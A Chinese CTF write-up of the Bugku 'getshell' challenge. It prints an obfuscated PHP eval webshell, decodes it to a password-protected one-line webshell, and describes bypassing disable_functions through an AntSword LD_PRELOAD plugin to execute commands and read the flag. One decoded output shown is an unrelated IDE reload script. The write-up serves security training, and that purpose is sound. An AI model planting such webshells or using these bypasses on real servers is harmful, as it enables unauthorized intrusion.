Bugku-CTF getshell

0675329

题目:

思路:

发现 php 代码被混淆了,我们解混淆一下,我们可以先打印一下 $BwltqOYbHaQkRPNoxcfnFmzsIjhdMDAWUeKGgviVrJZpLuXETSyC 这个参数,可以发现就是 base64 解码中介这串字符

image-20241218193840-6z15if5

$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";
eval('?>'.$BwltqOYbHaQkRPNoxcfnFmzsIjhdMDAWUeKGgviVrJZpLuXETSyC($hYXlTgBqWApObxJvejPRSdHGQnauDisfENIFyocrkULwmKMCtVzZ($vNwTOsKPEAlLciJDBhWtRSHXempIrjyQUuGoaknYCdFzqZMxfbgV($NviuywCePWEGlacAmfjrgBMTYXzHZpIxDqQnsUKkhotFSORdVJLb,$ciMfTXpPoJHzZBxLOvngjQCbdIGkYlVNSumFrAUeWasKyEtwhDqR*2),$vNwTOsKPEAlLciJDBhWtRSHXempIrjyQUuGoaknYCdFzqZMxfbgV($NviuywCePWEGlacAmfjrgBMTYXzHZpIxDqQnsUKkhotFSORdVJLb,$ciMfTXpPoJHzZBxLOvngjQCbdIGkYlVNSumFrAUeWasKyEtwhDqR,$ciMfTXpPoJHzZBxLOvngjQCbdIGkYlVNSumFrAUeWasKyEtwhDqR),$vNwTOsKPEAlLciJDBhWtRSHXempIrjyQUuGoaknYCdFzqZMxfbgV($NviuywCePWEGlacAmfjrgBMTYXzHZpIxDqQnsUKkhotFSORdVJLb,0,$ciMfTXpPoJHzZBxLOvngjQCbdIGkYlVNSumFrAUeWasKyEtwhDqR))));

在继续进行解返回混淆,如下

'.$BwltqOYbHaQkRPNoxcfnFmzsIjhdMDAWUeKGgviVrJZpLuXETSyC($hYXlTgBqWApObxJvejPRSdHGQnauDisfENIFyocrkULwmKMCtVzZ($vNwTOsKPEAlLciJDBhWtRSHXempIrjyQUuGoaknYCdFzqZMxfbgV($NviuywCePWEGlacAmfjrgBMTYXzHZpIxDqQnsUKkhotFSORdVJLb,$ciMfTXpPoJHzZBxLOvngjQCbdIGkYlVNSumFrAUeWasKyEtwhDqR*2),$vNwTOsKPEAlLciJDBhWtRSHXempIrjyQUuGoaknYCdFzqZMxfbgV($NviuywCePWEGlacAmfjrgBMTYXzHZpIxDqQnsUKkhotFSORdVJLb,$ciMfTXpPoJHzZBxLOvngjQCbdIGkYlVNSumFrAUeWasKyEtwhDqR,$ciMfTXpPoJHzZBxLOvngjQCbdIGkYlVNSumFrAUeWasKyEtwhDqR),$vNwTOsKPEAlLciJDBhWtRSHXempIrjyQUuGoaknYCdFzqZMxfbgV($NviuywCePWEGlacAmfjrgBMTYXzHZpIxDqQnsUKkhotFSORdVJLb,0,$ciMfTXpPoJHzZBxLOvngjQCbdIGkYlVNSumFrAUeWasKyEtwhDqR))));

?>

image-20241218195341-2yqw3us

得到下面一大串,然后去美化一下 [Php在线解美化、混淆、加密、解密 - 在线工具](https://tool.lu/php/)




然后直接去打印一下 eval 里面执行的结果

image-20241218195539-u9ht7j1

得到如下

$FNhvZGJgVQUmzrpljeqkOYMSIbTtosKLBxRWaHiCcEDudXAwPyfn="ZnzvrDesIiMmAJPCtVpXwSQGalULhWodycFETxgYubRBHKOkNjfqsaRJyYqOKcUrmWAvlbgfMPFHowthjVdiTIpXBEnQZzSLuGkCDeNxAY9MoumnAR4=";
eval('?>'.$ayNqneorDHxFBSwcKhLjJPtOiCfYAgZvblXURTWVmpEMQGkzIdsu($YGZHvipCuzOVqrWTQFlfyBItPshbcxeJMKaEXomwRgnUkSdALNDj($TdpMJkhXEqZNcPaxbyKWGzVtegQnrYLOFiujDCmHRlwABoUIvSsf($FNhvZGJgVQUmzrpljeqkOYMSIbTtosKLBxRWaHiCcEDudXAwPyfn,$szecmYuarlxFUIWyobtfnLNJQTCDvPkVSGHgEZiXhOMKwpBdAjqR*2),$TdpMJkhXEqZNcPaxbyKWGzVtegQnrYLOFiujDCmHRlwABoUIvSsf($FNhvZGJgVQUmzrpljeqkOYMSIbTtosKLBxRWaHiCcEDudXAwPyfn,$szecmYuarlxFUIWyobtfnLNJQTCDvPkVSGHgEZiXhOMKwpBdAjqR,$szecmYuarlxFUIWyobtfnLNJQTCDvPkVSGHgEZiXhOMKwpBdAjqR),$TdpMJkhXEqZNcPaxbyKWGzVtegQnrYLOFiujDCmHRlwABoUIvSsf($FNhvZGJgVQUmzrpljeqkOYMSIbTtosKLBxRWaHiCcEDudXAwPyfn,0,$szecmYuarlxFUIWyobtfnLNJQTCDvPkVSGHgEZiXhOMKwpBdAjqR))));
$HfuSgMBOxhovrtnmYzkUGFEZsiDXyJIlbKCWjpVLPTwcqeaNARdQ="WtCxsqEuLNTSGRkVfZKHjUYPIognBiFhrbyOXacAelmwpJdzvQDMFbRYnLeWuGTKsNZvOpcgErtXBxCQljVfDwSmyqHikPMzdJaIoAhUXh9zqgiGRMfdp2fnqFaxaV9MqFYPcs5LvQPIAPd2kgJUq0pppe5opMGQN3vfa0NctMYzT1GNNrfKvF1uqrVxkZPhpyNATyVtv1Admz0cAsv2tFzxJV9AT1GrF3PbwsPIqyGdH2Pow2bacTn=";
eval('?>'.$HbXdtGUkeEDlRgpwsarfnVYoTSKIcPvhCWjBizQLZxFMuymANqJO($IoceCnqVKOFkrlRjUPEdNhAuSMJBzmGvTLytisgpZYbQXHfDwWxa($DcbyPNpYSKuECvekIVZlOQFTMwgXinAfaoHdzqhGWRrLsmJBjUtx($HfuSgMBOxhovrtnmYzkUGFEZsiDXyJIlbKCWjpVLPTwcqeaNARdQ,$kcwKbSghWizYEuAGDOTFaHXQRtnLyBlJpCImejsrNvZqPUVxfMdo*2),$DcbyPNpYSKuECvekIVZlOQFTMwgXinAfaoHdzqhGWRrLsmJBjUtx($HfuSgMBOxhovrtnmYzkUGFEZsiDXyJIlbKCWjpVLPTwcqeaNARdQ,$kcwKbSghWizYEuAGDOTFaHXQRtnLyBlJpCImejsrNvZqPUVxfMdo,$kcwKbSghWizYEuAGDOTFaHXQRtnLyBlJpCImejsrNvZqPUVxfMdo),$DcbyPNpYSKuECvekIVZlOQFTMwgXinAfaoHdzqhGWRrLsmJBjUtx($HfuSgMBOxhovrtnmYzkUGFEZsiDXyJIlbKCWjpVLPTwcqeaNARdQ,0,$kcwKbSghWizYEuAGDOTFaHXQRtnLyBlJpCImejsrNvZqPUVxfMdo))));

继续解混淆,依然是去打印一下这啷个 eval 看看执行了啥

'.$ayNqneorDHxFBSwcKhLjJPtOiCfYAgZvblXURTWVmpEMQGkzIdsu($YGZHvipCuzOVqrWTQFlfyBItPshbcxeJMKaEXomwRgnUkSdALNDj($TdpMJkhXEqZNcPaxbyKWGzVtegQnrYLOFiujDCmHRlwABoUIvSsf($FNhvZGJgVQUmzrpljeqkOYMSIbTtosKLBxRWaHiCcEDudXAwPyfn,$szecmYuarlxFUIWyobtfnLNJQTCDvPkVSGHgEZiXhOMKwpBdAjqR*2),$TdpMJkhXEqZNcPaxbyKWGzVtegQnrYLOFiujDCmHRlwABoUIvSsf($FNhvZGJgVQUmzrpljeqkOYMSIbTtosKLBxRWaHiCcEDudXAwPyfn,$szecmYuarlxFUIWyobtfnLNJQTCDvPkVSGHgEZiXhOMKwpBdAjqR,$szecmYuarlxFUIWyobtfnLNJQTCDvPkVSGHgEZiXhOMKwpBdAjqR),$TdpMJkhXEqZNcPaxbyKWGzVtegQnrYLOFiujDCmHRlwABoUIvSsf($FNhvZGJgVQUmzrpljeqkOYMSIbTtosKLBxRWaHiCcEDudXAwPyfn,0,$szecmYuarlxFUIWyobtfnLNJQTCDvPkVSGHgEZiXhOMKwpBdAjqR))));
$HfuSgMBOxhovrtnmYzkUGFEZsiDXyJIlbKCWjpVLPTwcqeaNARdQ="WtCxsqEuLNTSGRkVfZKHjUYPIognBiFhrbyOXacAelmwpJdzvQDMFbRYnLeWuGTKsNZvOpcgErtXBxCQljVfDwSmyqHikPMzdJaIoAhUXh9zqgiGRMfdp2fnqFaxaV9MqFYPcs5LvQPIAPd2kgJUq0pppe5opMGQN3vfa0NctMYzT1GNNrfKvF1uqrVxkZPhpyNATyVtv1Admz0cAsv2tFzxJV9AT1GrF3PbwsPIqyGdH2Pow2bacTn=";
echo ('?>'.$HbXdtGUkeEDlRgpwsarfnVYoTSKIcPvhCWjBizQLZxFMuymANqJO($IoceCnqVKOFkrlRjUPEdNhAuSMJBzmGvTLytisgpZYbQXHfDwWxa($DcbyPNpYSKuECvekIVZlOQFTMwgXinAfaoHdzqhGWRrLsmJBjUtx($HfuSgMBOxhovrtnmYzkUGFEZsiDXyJIlbKCWjpVLPTwcqeaNARdQ,$kcwKbSghWizYEuAGDOTFaHXQRtnLyBlJpCImejsrNvZqPUVxfMdo*2),$DcbyPNpYSKuECvekIVZlOQFTMwgXinAfaoHdzqhGWRrLsmJBjUtx($HfuSgMBOxhovrtnmYzkUGFEZsiDXyJIlbKCWjpVLPTwcqeaNARdQ,$kcwKbSghWizYEuAGDOTFaHXQRtnLyBlJpCImejsrNvZqPUVxfMdo,$kcwKbSghWizYEuAGDOTFaHXQRtnLyBlJpCImejsrNvZqPUVxfMdo),$DcbyPNpYSKuECvekIVZlOQFTMwgXinAfaoHdzqhGWRrLsmJBjUtx($HfuSgMBOxhovrtnmYzkUGFEZsiDXyJIlbKCWjpVLPTwcqeaNARdQ,0,$kcwKbSghWizYEuAGDOTFaHXQRtnLyBlJpCImejsrNvZqPUVxfMdo))));

image-20241218195814-bdt6sbh

image-20241218200542-ewbqwh0

?>?>
(function() {
  var ws = new WebSocket('ws://' + window.location.host + 
             '/jb-server-page?reloadMode=RELOAD_ON_SAVE&'+
             'referrer=' + encodeURIComponent(window.location.pathname));
  ws.onmessage = function (msg) {
      if (msg.data === 'reload') {
          window.location.reload();
      }
      if (msg.data.startsWith('update-css ')) {
          var messageId = msg.data.substring(11);
          var links = document.getElementsByTagName('link');
          for (var i = 0; i < links.length; i++) {
              var link = links[i];
              if (link.rel !== 'stylesheet') continue;
              var clonedLink = link.cloneNode(true);
              var newHref = link.href.replace(/(&|?)jbUpdateLinksId=d+/, "$1jbUpdateLinksId=" + messageId);
              if (newHref !== link.href) {
                clonedLink.href = newHref;
              }
              else {
                var indexOfQuest = newHref.indexOf('?');
                if (indexOfQuest >= 0) {
                  // to support ?foo#hash 
                  clonedLink.href = newHref.substring(0, indexOfQuest + 1) + 'jbUpdateLinksId=' + messageId + '&' + 
                                    newHref.substring(indexOfQuest + 1);
                }
                else {
                  clonedLink.href += '?' + 'jbUpdateLinksId=' + messageId;
                }
              }
              link.replaceWith(clonedLink);
          }
      }
  };
})();


可以发现这是我们想要的源码,一句话木马,密码是 ymlisisisiook



可以发现我们命令执行没反应,那我们先看看 phpinfo

image-20241218200734-smw7v5m

可以发现这里禁用了好多函数,上面那个 system 也被禁了。我们可以利用蚁剑的一个插件绕过,disable_functions

image-20241218201056-9kvxj57

直接使用蚁剑连接,现在是无法命令执行的

image-20241218201456-3tfx80j

然后选择插件

image-20241218201337-9bt4w6n

选择 LD_PRELOAD 模式,点击开始,可以看到代理脚本`.antproxy.php`​上传成功

image-20241218201636-egbukpm

然后可以看到,目录下多了一个.antproxy.php,我们直接访问 url/.antproxy.php

image-20241218201845-89kx9wk

然后就可以直接命令执行了,这一步也可以继续使用蚁剑进行连接,密码还是上面的 ymlisisisiook

image-20241218202100-pa0zvxe

image-20241218202232-plgjg9a

flag:flag{5710bb9cd7a8717e5ceeb54c65529606}

玄机博客
© 版权声明

1.本站内容仅供参考,不作为任何法律依据。用户在使用本站内容时,应自行判断其真实性、准确性和完整性,并承担相应风险。

2.本站部分内容来源于互联网,仅用于交流学习研究知识,若侵犯了您的合法权益,请及时邮件或站内私信与本站联系,我们将尽快予以处理。

3.本文采用知识共享 署名4.0国际许可协议 [BY-NC-SA] 进行授权

4.根据《计算机软件保护条例》第十七条规定“为了学习和研究软件内含的设计思想和原理,通过安装、显示、传输或者存储软件等方式使用软件的,可以不经软件著作权人许可,不向其支付报酬。”您需知晓本站所有内容资源均来源于网络,仅供用户交流学习与研究使用,版权归属原版权方所有,版权争议与本站无关,用户本人下载后不能用作商业或非法用途,需在24个小时之内从您的电脑中彻底删除上述内容,否则后果均由用户承担责任;如果您访问和下载此文件,表示您同意只将此文件用于参考、学习而非其他用途,否则一切后果请您自行承担,如果您喜欢该程序,请支持正版软件,购买注册,得到更好的正版服务。

5.本站是非经营性个人站点,所有软件信息均来自网络,所有资源仅供学习参考研究目的,并不贩卖软件,不存在任何商业目的及用途

THE END
网络安全
# 网络安全
喜欢就支持一下吧
点赞329 分享
网络安全助手的头像-玄机博客
关键截止日期: 在 2025 年 1 月 7 日之前更新旧 .NET 域名以避免服务中断-玄机博客
关键截止日期: 在 2025 年 1 月 7 日之前更新旧 .NET 域名以避免服务中断
关键截止日期: 在 2025 年 1 月 7 日之前更新旧 .NET 域名以避免服...
1个月前 2001
浅析IPV6单栈的优缺点-玄机博客
浅析IPV6单栈的优缺点
浅析IPV6单栈的优缺点
3个月前 1999
Veracode 收购 Phylum 技术以应对软件威胁-玄机博客
